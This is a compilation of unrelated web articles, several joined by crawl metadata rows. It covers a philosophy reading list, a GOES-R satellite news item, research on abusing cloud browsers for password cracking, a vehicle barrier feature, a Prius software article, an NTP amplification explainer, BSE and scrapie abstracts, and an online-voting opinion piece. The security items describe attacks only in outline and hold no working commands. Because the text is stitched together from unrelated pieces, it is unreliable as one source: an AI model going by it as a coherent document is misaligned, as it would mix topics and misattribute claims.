Okay, I’ll admit it. I used Wikipedia to look up things for my book, Socrates Reloaded: The Case for Ethics in Business and Technology. Wikipedia is good at and meant for getting a first impression of a subject to see if it is worth further studying. I also used Google, searching for popular and academic pages and papers that helped clarify complex topics and arguments. Who doesn’t? The moment some part of my book captures your attention, these are great ways to start learning more, as you probably do daily in your own work and activities.
What is missing from Wikipedia, Google and most other web resources is a rich context that makes you understand the bigger picture. How can trends in philosophy be explained as a reaction to other trends? How did the various philosophers influence each other? What place do certain philosophies have as a product of their time in history? These are not questions that are easily answered by browsing around. They require richer sources.
Following is a very small selection of sources I used in writing Socrates Reloaded. I selected the ones that would be the most interesting for those readers who’d like to delve a little deeper. From there, dear reader, I am sure you will find your own way through a lifetime of learning.
Stanford Encyclopedia of Philosophy and the Internet Encyclopedia of Philosophy
These are the best Web resources that I have found. They are comprehensive, both in breadth and in depth. As there are many contributing authors, some entries are easier to read than others. But overall, these have become my first go-to places if I want to understand a new topic in philosophy.
Justice – Michael Sandel
Harvard University’s main philosophy professor, Michael Sandel, has put a complete series of lectures on YouTube. These lectures are full of humor, student interaction and amazing insights. Watching all of them helped me prepare for a number of themes in the book. Most of what is discussed in the series is also part of Sandel’s book, called Justice. This book is one of the few in-depth philosophy books I read with contemporary examples, and it is really fun to read.The History of Philosophy – Brian Magee
Probably the best place to start to get a quick overview of the complete history of philosophy is Bryan Magee's book, The History of Philosophy. Abundantly illustrated, it captures the essence of most schools of thought, from the old Greeks and Chinese to twentieth century philosophy.
History of Western Philosophy – Bertrand Russell
However, if you are in for some serious reading, the best overview that I have read so far is Bertrand Russell's History of Western Philosophy. Russell, a renowned 20th century philosopher himself, argues that if the old philosophers claimed universal truth on a number of issues, it is perfectly okay to challenge those truths with the knowledge and progress of today. Russell doesn't hold back and doesn't accept the "you have to see the work of the old philosophers in the light of the world in which they lived back then" excuse. As a famous philosopher in his own right, Russell presents a thorough overview and takes a position himself. He has skin in the game.
Philosophy for Dummies – Tom Morris
Don’t laugh. This is a very good general overview of philosophy. For dummies? Hardly. It takes extreme skill to describe various philosophical schools of thought in plain and simple terms, without losing the essence of them. A definite must-read. It has been an inspiration for me to learn how to boil down complex discussions to the essence.Moral Theory, An Introduction – Mark Timmons
In studying philosophy, it won’t take you long to identify the topics that resonate most with you. For me, the topics were ethics and moral theory as bits and pieces of political philosophy. Not the easiest of books to read, Moral Theory provides a thorough overview of all schools of thought in this area.Contemporary Political Philosophy – Will Kymlicka
Kymlicka’s book is considered the standard overview on political philosophy. Again, it’s not the most entertaining of reads, but it does provide a good overview. Kymlicka focuses on comparing and contrasting different schools of thought, instead of describing them independent from each other.Examined Lives – James Miller
We are all the product of our time. Even some of the great philosophers had trouble overcoming the shortcomings of their own paradigms. For instance, Hegel reasoned that the 19th century Prussian form of government truly presented the ideal state. James Miller doesn't describe the various philosophies in different ages; he describes the lives of the philosophers against the backdrop of the time and place where they lived. The title is a very appropriate reference to a famous quote from Socrates: "The unexamined life is not worth living."
The Art of War – Sun Tzu
Not really a book that has a story line or a clear logic in argument, The Art of War is more of a collection of short lessons and statements. Very relevant for today's business nevertheless.
The Prince – Machiavelli
Who would think a 16th century book could be an entertaining read? Machiavelli's The Prince certainly is. Unlike most other philosophers, Machiavelli doesn't describe how things should be, but how they work in practice. It seems many lessons of power and leadership apply as much in the 16th century as they do now.
The Republic – Plato
Most of Plato's work is written in the form of dialogue, often featuring his master Socrates. It is unclear if Plato is putting his own words in Socrates' mouth, or is truly representing Socrates' view. Many English translations have copious footnotes and elaborate side descriptions to explain what Plato is telling us through the dialogues, giving both the pleasure of the dialogue and a thorough background.
If you are in search of wisdom, I am afraid none of these books will provide the definitive answer. But that shouldn't stop you. Starting with one or a few of these books can be a humbling experience. They may teach you how you can stand on the shoulders of giants. They may tell you where you stand so you know that your point of view is not unique. It is probably discussed (and rejected by others) on a much deeper level than you could do yourself. These books may also greatly help you frame, contextualize and sharpen your thoughts so you can better reflect. And that may very well be the beginning of wisdom.
Primary instrument ready for GOES-R installation
- By Frank Konkel
- Nov 04, 2013
One of six primary, state-of-the-art instruments developed for the National Oceanic and Atmospheric Administration’s next-generation geostationary satellites has been cleared for installation.
The Advanced Baseline Imager (ABI), developed by Exelis, will be shipped from Indiana to Lockheed Martin Space Systems in Colorado to be installed on the first Geostationary Operational Environmental Satellite (GOES-R), which is expected to launch in early 2016.
ABI is GOES-R’s primary instrument for scanning the planet’s weather, oceans and environment, offering faster imaging at higher resolutions than current space-based technology. The instrument also offers NOAA new forecast products for severe weather, volcanic ash advisories, fire, smoke monitoring and other types of hazards.
“The United States is home to some of the most severe weather in the world, including tornadoes, hurricanes, snowstorms, floods and wildfires,” said Mary Kicza, assistant administrator for NOAA’s Satellite and Information Service. “The ABI offers breakthrough technology that will help NOAA develop faster and more accurate forecasts that will save lives and protect communities.”
Despite a series of delays, the latest of which pushed the launch date from October 2015 to sometime in the first quarter of 2016, instrument development is on target for GOES-R. The spacecraft's first completed instrument, the Extreme Ultraviolet and X-ray Irradiance Sensors (EXIS), was finished in May 2013. It will provide scientists on the ground advance warning of solar storms.
The remaining planned GOES-R instruments are:
- Geostationary Lightning Mapper, which will provide for the first time a continuous surveillance of total lightning over the western hemisphere from space.
- The Space Environment In-Situ Suite, which consists of sensors that will monitor radiation hazards that can affect satellites and communications for commercial airline flights over the poles.
- The Solar Ultraviolet Imager, a high-powered telescope that observes the sun, monitoring for solar flares and other solar activity that could affect Earth.
- The Magnetometer, which will provide measurements of the space environment magnetic field that controls charged particle dynamics in the outer region of the magnetosphere. These particles can be dangerous to spacecraft and human spaceflight.
Frank Konkel is a former staff writer for FCW. | <urn:uuid:4d03f3f9-5dbf-46a3-a15f-935eac53e7dd> | CC-MAIN-2017-04 | https://fcw.com/articles/2013/11/04/noaa-abi-on-track.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00353-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902844 | 548 | 2.625 | 3 |
Researchers from North Carolina State University and the University of Oregon show how hackers can anonymously hijack computing power from cloud-based Web browsers.
Cloud-based browsing is intended to boost the performance of low-power devices, like mobile phones and tablets, by offloading the bulk of the computation to remote servers. However, by exploiting design vulnerabilities inherent in some cloud browsers, cyber-thieves can create a virtual compute farm dedicated to unlawful activities, like password cracking and denial of service attacks.
A new research paper, Abusing Cloud-Based Browsers for Fun and Profit, describes the parasitic computing ploy in detail. Considering the powerful capabilities of today’s cloud browsers, the researchers wondered: “Was it now possible to perform arbitrary general-purpose computation within cloud-based browsers, at no cost to the user?”
A technique called Browser MapReduce (BMR) is used to explore the computation and memory limits of four cloud browsers, Amazon Silk, Opera Mini, Cloud Browse and Puffin. BMR is based on Google’s MapReduce framework for the parallel processing of large datasets.
The researchers developed and tested three canonical MapReduce applications – word count, distributed grep, and distributed sort. A URL shortening service was used to pass large packets of data between nodes. The computations were completed successfully, but due to ethical considerations, packet sizes were kept to 100 MB or less. Researcher and co-author Dr. William Enck, an assistant professor of computer science at NC State, suggests that the same applications could be carried out using much larger datasets; the team simply didn't want this academic exercise to pose an undue burden on the systems they were using.
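The BMR engine itself schedules map and reduce jobs across rented browser rendering sessions and is not reproduced here; the following is only a minimal, self-contained Python sketch of the word-count MapReduce pattern the researchers exercised, not their code.

```python
from collections import defaultdict

def map_phase(documents):
    """Map step: emit a (word, 1) pair for every word in every document."""
    for doc in documents:
        for word in doc.split():
            yield word.lower(), 1

def reduce_phase(pairs):
    """Reduce step: sum the counts emitted for each distinct word."""
    counts = defaultdict(int)
    for word, count in pairs:
        counts[word] += count
    return dict(counts)

if __name__ == "__main__":
    docs = ["the quick brown fox", "the lazy dog", "the fox"]
    print(reduce_phase(map_phase(docs)))  # e.g. {'the': 3, 'fox': 2, ...}
```

In BMR, each mapper and reducer would instead run inside a separate cloud rendering session, with intermediate results passed between nodes through URL-shortener links rather than returned in memory.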
Based on their findings and observations, the authors conclude that “the computational ability made freely available by cloud browsers allows for an open compute center that is valuable and warrants substantially more careful protection.”
As one example of the potential for misuse, they simulated a password cracking implementation and found that with Puffin, 24,096 hashes could be generated per second for a total of 200 million per job.
The paper provides several recommendations aimed at improving the security of cloud-based browsers.
1. Providers should place resource limitations on rendering tasks.
2. Because a framework such as BMR can link jobs to create a computation grid, providers should also rate limit connections from mobile clients. One way to do this is to require users to create accounts, and place rate limits on authenticated users.
3. To help reduce the ability to clone instances, the browser could require registration and use a device-specific private key as part of its handshake protocol with the cloud-based renderers. The Amazon Silk browser already does this.
4. Techniques such as CAPTCHAs can limit the rate of creating new accounts.
The paper will be presented this Thursday at the Annual Computer Security Applications Conference in Orlando, Fla. | <urn:uuid:01beab88-1e59-4c03-86fc-eb5a16beef20> | CC-MAIN-2017-04 | https://www.hpcwire.com/2012/12/03/cloud_browser_hack_exposed/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00471-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9301 | 602 | 2.96875 | 3 |
Assessing risks from vehicular crashes is part of designing an outdoor perimeter solution. In this article, David Dickinson, Senior Vice President of Delta Scientific, discusses some of the issues that need to be taken into consideration for a secure yet aesthetic perimeter.
Keeping pedestrians safe, protecting structures from accidental or intentional automobile crashes, and force protection (keeping employees and visitors from harm) have always been a concern. From pedestrian-filled farmers markets and universities to new-and-used car lots, a wide variety of agencies find peace of mind through the use of barriers, bollards, barricades and crash gates for vehicle-based physical access control at the perimeter.
Risk Assessment Starts With Physics 101
When evaluating the security risk for a given facility, particular attention must be focused on the weights and velocities of vehicles that would be used to attempt penetration into sensitive areas.
A vehicle moving towards a barricade has a certain kinetic energy, which is the major measure of how much "hitting power" it possesses. Mathematically, kinetic energy is derived from the vehicle velocity and its weight (mass). On impact, some of this energy is converted to heat, sound and permanent deformation of the vehicle. The barricade must absorb the remainder of this energy if the vehicle is to be stopped.
The amount of remaining energy varies depending on many factors, primarily the velocity of the vehicle at the moment of impact. The amount of kinetic energy posed by a vehicle changes as the square of its velocity. For example, a vehicle moving at 50 mph (80 kph) has 25 times as much kinetic energy as it would at 10 mph (16 kph). Thus, an armored car weighing 30 times as much as a Toyota Corolla and moving at 10 mph (16 kph) would have less hitting power than the Toyota moving at 60 mph (96 kph)!
Because of the relationship of velocity to the total kinetic energy possessed by the vehicle, every effort must be made by the security engineer to force a vehicle to slow down before it reaches the barricade. The most frequently used technique is to require a sharp turn immediately in front of the barrier. When vehicle speed is reduced by 50 percent, the "hitting power" is reduced to one-quarter. If the speed is reduced by two-thirds, the force of impact drops to one-ninth.
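A quick back-of-the-envelope check of these figures uses the standard kinetic energy formula KE = ½mv²; the vehicle masses in the sketch below are assumptions chosen only for illustration, not figures from the article.

```python
def kinetic_energy(mass_kg, speed_mph):
    """Kinetic energy in joules: 0.5 * m * v^2, with speed converted from mph to m/s."""
    v = speed_mph * 0.44704  # 1 mph = 0.44704 m/s
    return 0.5 * mass_kg * v ** 2

corolla = 1300            # assumed mass of a compact car, kg
armored = 30 * corolla    # a vehicle 30 times heavier

# Energy rises with the square of speed: 50 mph carries 25x the energy of 10 mph.
print(kinetic_energy(corolla, 50) / kinetic_energy(corolla, 10))   # 25.0

# The 30x heavier vehicle at 10 mph still hits with less energy than the compact at 60 mph.
print(kinetic_energy(armored, 10) < kinetic_energy(corolla, 60))   # True

# Halving the approach speed cuts the energy the barricade must absorb to one quarter.
print(kinetic_energy(corolla, 25) / kinetic_energy(corolla, 50))   # 0.25
```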
Upon designing a way to slow down vehicle approach, precautions should also be taken that the attacking car cannot make a "corner cutting shot" at a barricade. Often, only a light post defines a turning point and a speeding car can take it out and not even hesitate. Knolls and other impediments should be considered.
Failing to understand this and not using the proper equipment to counter the threat may lead to a false sense of security.
Where turns cannot be created, many are turning to an Early Warning System. This system is best applied at locations where there is a long and relatively straight run into the facility that would allow a large vehicle to build up its speed. A vehicle traveling at 60 mph (96 kph) covers 88 feet per second (26.8 m/sec), so it is imperative that the guards be alerted immediately.
Continuous Doppler radar picks up instantaneous changes in velocity and addresses the threat scenario in which an inbound vehicle approaches at normal speeds and then accelerates to commence the attack. It will also send a warning if a hidden vehicle suddenly passes a larger vehicle and attempts an attack. Once alerted, the guards can take action, including raising the barrier systems.
Overcoming Common Design Deficiencies
As discussed above, linear thinking will not get you very far when planning a vehicular perimeter security system. Straight lines make for faster and easier approaches for vehicles, so it is best to create curves on the access roads to your facility as a natural impediment to speeding cars or trucks.
Another common planning deficiency occurs when designers choose noncertified barriers or barricades. Certified equipment has been tested and proven to work under extreme conditions, giving planners the confidence they rely on. No area is more critical to the vehicle barrier selection process than testing. Without adequate testing, there is no assurance that the barrier will resist the threat. Testing is normally by an independent testing company or government agency, such as the U.S. Department of State (DoS) and military. Comprehensive reports of test results are issued and are available from the testing agency or manufacturer.
Today's barriers and bollards are capable of stopping and destroying a truck weighing up to 65,000 pounds (29,454 kg) and traveling at 50 mph (80 kph). Such barricades can be raised or lowered at will to stop traffic or let it through. In an emergency, the thick steel plates or bollards pop out of the ground within 1.5 seconds.
When integrated properly into a total system, including fences, lights, alarms, gates, and other security components, vehicle barriers are a key measure in preventing threats to sensitive resources. It is important to consider supplemental gate and fencing reinforcements that might be needed to optimize vehicle barrier effectiveness.
In designing a barrier system, you must also consider whether to use a passive or active system. Normally, an active system keeps the barrier in the active or up position. It must be deactivated to permit access. Active systems are preferable to ones that must be activated to prevent access because they are more secure.
One final area that should not be overlooked is aesthetics. With today's smart designs, it is no longer necessary to choose between form and function. You can have them both. Designers are creating secure environments with more compatible and aesthetically pleasing architectural elements.
If you visit the U.S. Capitol today, for example, you will see landscaped islands at the north and south entrance drives which regulate vehicular access. If allowed to drive into the Capitol complex, you will cross over vehicle control barriers and bollards at the entrances. Indeed, all exits at the end of all drives are controlled with barriers, which pop from the ground when needed.
You will see similar barriers and bollards at refineries, distribution centers and headquarters offices of petrochemical and hydrocarbon companies, literally around the world.
Putting New Vehicular Threat Tactics on the Defensive
By their very nature, terrorist attacks are unpredictable and predicated on surprise. Staying one step ahead by identifying vulnerable areas, and securing them, is critical to staving off vehicular attacks.
That means being able to deploy security equipment in tough conditions, at a moment's notice. Fortunately such equipment now exists in the form of portable and towable temporary barriers. These barriers can be deployed quickly and effectively, even in places where it is impossible to excavate for a permanent foundation, such as the streets of Paris.
Terrorists typically do not go where they see barricades, so placing them wherever possible attacks can happen reduces security risks dramatically. Temporary barriers can protect facilities while permanent ones are being built, and they are even effective for the long-term where physical conditions preclude permanent solutions.
There are many types of available portable barriers and barricades:
Drop arm barrier
Able to be deployed or relocated for full manual or automatic operation within two hours, these quick deployment barriers will stop and destroy a 15,000 pound (6,800 kg) truck traveling at 30 mph (48 kph) in less than 20 feet (5.5 m). They secure an entrance roadway eight to 24 feet (3.2 to 9.6 m) in width from vehicle attack. Hydraulic and manual versions are available.
Portable plate barricades
Portable plate barricades provide security against vehicle-based terrorism or thefts for high-cycle locations such as the entrances to large office facilities, government agencies and military bases. Able to be deployed in high traffic locations for full manual or automatic operation within two hours, the quick deployment modular barricades feature a phalanx-type rising plate barrier mounted within multiple inertial pods.
The plate barrier lies level to the ground to allow vehicles to pass and is raised or lowered into position utilizing a hydraulic cylinder driven by a hydraulic power unit. The hydraulic pumping unit can be sized to provide pass-through rates suitable for most inspection and identification station requirements.
Towed portable crash barriers
Able to be deployed in 10 to 15 minutes, the newest portable high security vehicle crash barriers can quickly protect facilities and people from vehicle attacks and accidents. Some mobile crash barriers can be towed into position by a golf cart. The mobile barriers operate locally or remotely for guard protection.
Deployment, retrieval and operation are all hydraulic. The barriers stop and disable a 15,000-pound (6,818 kg) vehicle moving at 30 mph (48 kph). These portable crash barriers were built for U.S. federal government security specialists wanting a system that could be rapidly deployed and then operated as a regular security gate or barrier system. Once positioned, the mobile barricade is separated from its transporter and lowered into position by means of a batteryoperated hydraulic power system, which is then used to raise or lower the barrier for normal or emergency tasks. Commercial versions are just as well-suited for protecting a farmer's market and other business events from errant drivers. Light enough to be towed by a golf cart and set up in only 10 minutes, the DSC 1000 portable barrier passed an ASTM crash test, stopping a 5,000-pound (2,300 kg) vehicle going 40 mph (64 kph), providing it with an ASTM rating of P40.
Contrary to the "hard stop" wanted with antiterrorist crash-tested barricades, testing of the new DSC 1000 demonstrated that the collision did not distort the passenger compartment of the vehicle. Instead, Soft Stop technology decelerates and stops the vehicle over a short distance, referred to as "occupant ride down acceleration." This protects the errant driver as well as pedestrians.
Permanent Barriers and Barricades
From parking lot security to stopping vehicles access at refineries, there are a variety of suitable barricades available. Solutions include high-security surface mounted barricades, cable beam barricades, high security barriers and very high security, shallow foundation barriers. High security barriers are all crash rated in widths up to 288 inches (732 cm) and up to 38 inches (96.5 cm) high. Lowered to allow passage of authorized vehicles, these barriers are the first line of defense at critical facilities.
High-security surface mounted barricades allow quick installation into difficult locations such as parking structure ramps or areas with subsurface drainage problems. These crash-rated barricades are lowered to allow passage of authorized vehicles and are available in widths up to 288 inches (732 cm).
Very high security, shallow foundation barriers are available for advanced counter-terrorism applications in subsurface conditions that negate extensive excavations. This type of barricade was designed for the U.S. Navy. Set in a foundation only ten to 18 inches (25.4 to 45.7 cm) deep, these shallow foundation barriers are able to survive and operate after a 1.2 million-foot-pound impact. With their shallow foundations and aesthetic design, they are major breakthroughs in high duty, antiterrorist barricades.
The shallow foundation barriers eliminate concerns about interference with buried pipes, power lines and fiber optic communication lines. The shallow foundation also reduces installation complexity, time, materials and corresponding costs. These types of barriers are suitable for high water table locations and areas with corrosive soils.
Cable beam barricades are available in hydraulic and manually operated models. All are crash rated with one version enhanced for higher security applications. The clear openings range from 10.5 to 24 feet (4.2 to 9.6 m). One model is configured as a swing gate for use where vertical lift is impractical. All other models are raised to allow passage of authorized vehicles.
Bollards Are Buff and Beautiful
When looking for a bollard solution, you choose the level of security you need. From protecting a headquarters to a warehouse or even a parked tanker, you can find a bollard system that will meet your needs.
With a foundation only 14 inches (35.5 cm) deep versus the four feet (1.2 m) typically required, the new DSC 600 Fixed Shallow Foundation Bollards can be installed within sidewalks, on top of concrete deck truss bridges or in planters as well as conform to the inclines and turns of a locale. The new two-bollard modules, which can be arrayed in whatever length is required, will stop and destroy a 15,000-pound (66.7 kN) truck traveling 50 miles per hour (80 kph).
They have already successfully passed a K12 rating crash test, providing proof of their ability to provide high-energy stops. It is the first Shallow Foundation Bollard to meet the U.S. Department of State Specification, Revision A, that requires the bed of the attacking truck to go less than 39 inches (1 m) beyond the point of impact.
Bollard systems that raise or lower can operate individually or in groups up to 10 and are used for intermediate level security applications. Individual bollards are up to 12.75 inches (32.39 cm) in diameter, up to 35 inches (88.9 cm) high and are usually mounted on 3 to 5 foot (1.2 to 2 m) centers. Hydraulic versions can be operated by a variety of control systems. Manual versions are counterbalanced and lock in the up or down position. All models are crash rated and lower to allow passage of authorized vehicles.
They are tested to stop and destroy an attacking vehicle weighing 10,000 pounds (4,545.5 kg) moving at 65 miles per hour (104 kph) or a 20,000-pound (9,091 kg) vehicle moving at 46 miles per hour (73.6 kph).
With bollards, you can create the look you want. Ranging from faceted, fluted, tapered, rings and ripples, colors, pillars, to shields, emblems and logos, bollards are aesthetically pleasing and versatile. You can specify ornamental steel trim attached directly to the bollard, or select cast aluminum sleeves, which slip over the crash tube. Bollards can be galvanized for corrosion resistance, fitted with an internal warning light for increased visibility and engineered to suit high traffic volume. If the bollards are damaged, simply slip off the old and slip on the new.
No Application Too Large or Small
Protecting perimeters of facilities is no small responsibility. Knowing you have got the right equipment in place to secure a facility and to prevent human tragedy brings a peace of mind that no amount of money can buy. Carefully researching available options and consulting with experts will ultimately lead to the right solution. | <urn:uuid:f000d620-2b36-4dce-8f60-9fa5ccdc75b7> | CC-MAIN-2017-04 | https://www.asmag.com/showpost/5350.aspx?pv=3 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00106-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93428 | 3,053 | 2.90625 | 3 |
Computer on Wheels
By Mel Duvall | Posted 2005-08-04
Strong sales of Toyota's Prius hybrid vehicles could be threatened by software malfunctions that leave drivers stuck in traffic.
At its heart, the Prius is a computer on wheels. After slipping into the driver's seat, the owner simply pushes a button on the dash, much as you might press the On button on a computer, and the vehicle powers up. This technology is often referred to as drive-by-wire, as there are no traditional cables, hydraulic lines or linkages connecting the gas pedal to the engine, the brake pedal to the brakes, or the stick shift to the transmission. If the car is in Park or Neutral and you press down on the gas pedal, the engine will not race as it would in a normal car, because the computer determines there is no purpose in doing so.
A touch-sensitive console located in the center of the dashboard provides access to a number of features, such as radio settings and climate controls, as well as updates on the vehicle's performance. The screen shows, for example, a graphic representation of the power flow from the electric motor or gas engine in the hybrid system, and the average miles per gallon achieved over the last 5 minutes and 30 minutes.
Virtually every major subsystem of the vehicle, from the electric motor to the gas engine and battery-pack system, has its own electronic control unit, a computer, to control and direct operations. The major electronic control units in turn communicate with one another over a high-bandwidth network. And orchestrating the entire operation is the hybrid ECU.
In action, it works like this: When initially pulling away, or driving at low speeds, the vehicle is powered by its electric motor. As the car picks up speed, the hybrid electronic control unit instructs the vehicle's gas engine to turn on and provide additional acceleration. The torque from the two motors is managed through a power splitting device called an electronic continuously variable transmission. At high speeds, the car runs primarily on the gas engine, which also recharges the vehicle's battery.
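Toyota's actual control software is proprietary, so the following is only a toy sketch of the kind of power-split decision the article describes the hybrid ECU making; the thresholds, names and modes are invented for illustration.

```python
def power_split(speed_mph, battery_charge, demand):
    """Toy illustration of a hybrid power-split decision (all thresholds are invented)."""
    if speed_mph < 15 and battery_charge > 0.3 and demand < 0.5:
        return "electric motor only"          # pulling away / low-speed driving
    if demand > 0.7:
        return "gas engine plus electric assist"  # hard acceleration
    if battery_charge < 0.3:
        return "gas engine, recharging battery"
    return "gas engine primary"               # cruising at higher speeds

print(power_split(speed_mph=10, battery_charge=0.8, demand=0.2))  # electric motor only
print(power_split(speed_mph=65, battery_charge=0.5, demand=0.4))  # gas engine primary
```

The real controller blends torque continuously through the electronic continuously variable transmission rather than switching between discrete modes like this.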
The combined systems give the Prius outstanding fuel mileage: 60 miles per gallon in the city and 51 on the highway, as estimated by the Environmental Protection Agency. (Unlike conventional vehicles, the Prius gets better fuel mileage in the city because it can drive more often on the electric motor.)
Its complexity, however, not only prevents most owners from tinkering under the hood, but has also been a concern for the automotive repair industry in general. "One look under the hood will scare you," says Craig Van Batenburg, owner of the Automotive Career Development Center in Worcester, Mass., which specializes in training independent garages on repairing vehicles. "They're more complicated, there are more computers, more sensors, and everything's packed in so tightly."
And they can be dangerous. Power to the Prius' electric motor is supplied by a 276-volt battery pack. The average person can be killed by a 60-volt shot to the pants. Van Batenburg says safety measures are more critical than ever with the hybrids, but the independent repair industry has to learn how to handle hybrids or risk losing an increasing share of business to the dealerships.
The average car owner probably isn't aware of how software updates even get into his vehicle. On most cars, a dongle, or data port, is installed just below the lower left side of the steering wheel. When the car is brought into the repair shop, a mechanic connects to the port and runs a set of diagnostic tests. The technology is a godsend for mechanics, according to Van Batenburg. "When the check-engine light comes on, it could be one of 600 things going wrong," he says. "Without the computer systems, it could take days to pinpoint a problem."
Updating the software in the Prius, or any other vehicle, is a relatively simple process. Most shops now provide mechanics with wireless laptop computers. The mechanic uses the laptop to go to a secured Web site provided by the manufacturer, and downloads the latest software update to the laptop. From there, it gets passed through the data port to the flash memory in the vehicle.
The Prius stalling problem may turn out to be minor. In fact, Van Batenburg speculates that a number of the incidents could simply be a result of owners trying to squeeze every bit of mileage they can out of a tank of gas and eventually hitting empty. (A number of Prius owners posting in online forums have insisted their tanks were not empty; Len says her car had plenty of gas left when it stalled.) However, it is also just as possible that the problem could be widespread and will result in a recall.
In the meantime, it doesn't appear to be affecting the vehicle's sales. Toyota says it sold 9,622 Prius vehicles in the U.S. in June, at the height of attention over the software flaw, a 119% increase over the previous year. In the first six months of 2005, gas-price-gouged consumers snapped up 53,310 of the $20,000 vehicles, compared to 21,890 in the first six months of 2004.
Owners like Len say they're not bothered by the increasing amounts of software in their vehicles and, in fact, can't wait for more innovations and software-driven features to be added to the Prius. But they want Toyota and all manufacturers to get it right.
"The computer techs, engineers and designers need to step up to the plate and fine-tune their craft," Len says. "Frankly, I hope I live long enough to own a flying car with whatever new technology is available to run it."
NTP, the Network Time Protocol, is a time synchronization protocol implemented on top of a transport protocol called UDP. UDP is designed for simplicity and speed at the cost of reliability, which suits the inherent time-sensitivity (or specifically, jitter sensitivity) of NTP. Time is an interesting case in computer security. Time isn't exactly secret; it has relatively minor confidentiality considerations, but in certain uses it's exceedingly important that multiple parties agree on the time. Engineering, space technology, financial transactions and such.
At the bottom is a simple equation:
denial of service amplification = bytes out / bytes in
When you get to a ratio > 1, a protocol like NTP becomes attractive as a magnifier for denial of service traffic.
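As a rough illustration of that arithmetic (the byte counts below are illustrative placeholders, not measurements of any particular server):

```python
def amplification(bytes_in, bytes_out):
    """Bandwidth amplification factor: response bytes divided by request bytes."""
    return bytes_out / bytes_in

# Illustrative numbers: a small spoofed query that elicits many large reply packets.
request = 234              # bytes sent by the attacker in one query (assumed)
response = 100 * 482       # ~100 reply packets of ~482 bytes each (assumed)

print(amplification(request, response))  # roughly 206x, far above the break-even ratio of 1
```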
UDP’s simplicity makes it susceptible to spoofing. An NTP server can’t always decide whether a request is spoofed or not; it’s up to the network to decide in many cases. For a long time, operating system designers, system implementers, and ISPs did not pay a lot of attention to managing or preventing spoofed traffic. It was and is up to millions of internet participants to harden their networking configuration to limit the potential for denial of service amplification. Economically there’s frequently little incentive to do so – most denial of service attacks target someone else, and the impact to being involved as a drone is relatively minor. As a result you get systemic susceptibility.
My advice is for enterprises and individuals to research and implement network hardening techniques on the systems and networks they own. This often means tweaking system settings, or in certain cases may require tinkering with routers and switches. Product specific hardening guides can be found online at reputable sites. As with all technology, the devil is in the details and effective management is important in getting it right. | <urn:uuid:54cc8831-88f8-4897-b0a9-89e2463e7535> | CC-MAIN-2017-04 | https://labs.neohapsis.com/2014/02/12/on-ntp-distributed-denial-of-service-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00408-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927683 | 378 | 3.390625 | 3 |
Ducrot C., French National Institute for Agricultural Research | Sala C., AFSSA Lyon | Ru G., Italian Reference Center for Animal | De Koeijer A., CVI | and 6 more authors.
European Journal of Epidemiology | Year: 2010
BSE is a zoonotic disease that caused the emergence of variant Creutzfeldt-Jakob disease in the mid 1990s. The trend of the BSE epidemic in seven European countries was assessed and compared, using Age-Period-Cohort and Reproduction Ratio modelling applied to surveillance data 2001-2007. A strong decline in BSE risk was observed for all countries that applied control measures during the 1990s, starting at different points in time in the different countries. Results were compared with the type and date of the BSE control measures implemented between 1990 and 2001 in each country. Results show that a ban on the feeding of meat and bone meal (MBM) to cattle alone was not sufficient to eliminate BSE. The fading out of the epidemic started shortly after the complementary measures targeted at controlling the risk in MBM. Given the long incubation period, it is still too early to estimate the additional effect of the ban on the feeding of animal protein to all farm animals that started in 2001. These results provide new insights into the risk assessment of BSE for cattle and humans, which will be especially useful in the context of possibly relaxing BSE surveillance and control measures. © 2010 Springer Science+Business Media B.V.
Fediaevsky A., French National Institute for Agricultural Research | Calavas D., AFSSA Lyon | Gasqui P., French National Institute for Agricultural Research | Moazami-Goudarzi K., French National Institute for Agricultural Research | and 4 more authors.
Genetics Selection Evolution | Year: 2010
Background: Since 2002, active surveillance programmes have detected numerous atypical scrapie (AS) and classical scrapie (CS) cases in French sheep with almost all the PrP genotypes. The aim of this study was 1) to quantify the genetic risk of AS in French sheep and to compare it with the risk of CS, and 2) to quantify the risk of AS associated with the increase of the ARR allele frequency as a result of the current genetic breeding programme against CS. Methods: We obtained genotypes at codons 136, 141, 154 and 171 of the PRNP gene for representative samples of 248 AS and 245 CS cases. We used a random sample of 3,317 scrapie negative animals genotyped at codons 136, 154 and 171 and we made inferences on position 141 by multiple imputation, using external data. To estimate the risk associated with PrP genotypes, we fitted multivariate logistic regression models and we estimated the prevalence of AS for the different genotypes. Then, we used the risk of AS estimated for the ALRR-ALRR genotype to analyse the risk of detecting an AS case in a flock homogeneous for this genotype. Results: Genotypes most at risk for AS were those including an AFRQ or ALHQ allele, while genotypes including a VLRQ allele were less commonly associated with AS. Compared to ALRQ-ALRQ, the ALRR-ALRR genotype was significantly at risk for AS and was very significantly protective for CS. The prevalence of AS among ALRR-ALRR animals was 0.6 and was not different from the prevalence in the general population. Conclusion: In conclusion, further selection of ALRR-ALRR animals will not result in an overall increase of AS prevalence in the French sheep population, although this genotype is clearly susceptible to AS. However, the probability of detecting AS cases in flocks participating in the genetic breeding programme against CS should be considered. © 2010 Fediaevsky et al; licensee BioMed Central Ltd.
Technology, with all its promise of time and cost savings, is often considered a panacea for the ills of our age – whether at the corporate, societal or personal level. I recently participated in a discussion about how technology might resolve an alarming trend in developed nations: the steady decline in voter turnout. (Just one vivid example: turnout among eligible voters in the most recent U.S. presidential election – 2008 – was a meager 63%.)
Using the Internet for online voting seems like a perfect way to increase participation in the democratic process. It is much easier for computer savvy societies to vote online rather than face the crowds and long lines at physical polling places. And with the recent explosion in numbers of portable devices with mobile Internet connectivity, you’d expect a large share of the US population to have the access necessary for such a plan.
Unfortunately, the reality is that there is no existing authentication mechanism currently deployed to the citizenry that is even remotely tamperproof. Before there can be a serious debate on the topic of online voting there would need to be a unique, modern citizen ID card. Such cards would need to incorporate the use of smartcard technology combined with military level encryption and authentication technologies. Today’s mobile devices simply won’t be compatible with these types of cards.
